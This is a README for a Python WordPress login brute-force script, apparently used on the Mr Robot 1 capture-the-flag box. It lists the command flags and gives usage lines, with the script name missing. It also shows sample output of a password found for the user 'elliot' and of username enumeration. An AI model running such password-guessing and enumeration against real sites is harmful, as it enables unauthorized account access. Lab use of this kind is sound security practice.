python-wp-bruteforce 🔥🚀

python Bruteforce login script for wordpress 👻

  • -p = file path to password list file
  • -u = username / file
  • -t = target address

target should should look like this

usage 🛸:

brute force with valid username 🎃:

python3 -t -u elliot -p /home/mivatampos/ctf/mr_robot_1/fsocity.txt

     ____      ____ _________  ____________  ____________                         
     \   \    /   / |_____   | |______     \ |_   ______|  
      \   \/\/   /  |     ___|   |    |   _/  |    ___|         
       \        /   |    |       |    |    \  |    |     
        \__/\__/    |____|       |_________/  |____|    

                  * By : intrglctcMilk  *  
                  *     -- @tmpts       * 

  [+] Attacking [+] ==> tries : 10 

  [+] **** PASSWORD FOUND ***** [+] =====> [ER28-0652] for user elliot
  [-] Time lapsed : 0.4780855178833008 seconds  [-] 
  [-] Number of attempts : 37 [-] 

Enumarating users 🔎

( just dont provide the -p flag it will use the default "admin" password to attempt the login : \n python3 -t -u usernames.txt

     ____      ____ _________  ____________  ____________                         
     \   \    /   / |_____   | |______     \ |_   ______|  
      \   \/\/   /  |     ___|   |    |   _/  |    ___|         
       \        /   |    |       |    |    \  |    |     
        \__/\__/    |____|       |_________/  |____|    

                  * By : intrglctcMilk  *  
                  *     -- @tmpts       * 

  [+] Attacking [+] ==> tries : 10 
  *** VALID USERNAME WAS FOUND *** ===> [elliot ] 
  [+] Attacking [+] ==> tries : 26 
  *** VALID USERNAME WAS FOUND *** ===> [john] 
  [+] Attacking [+] ==> tries : 40 
  *** VALID USERNAME WAS FOUND *** ===> [example] 
  [+] Attacking [+] ==> tries : 42 

  [x] *** List of valid usernames *** [x]
             [+] elliot [+]
             [+] john [+]
             [+] example [+]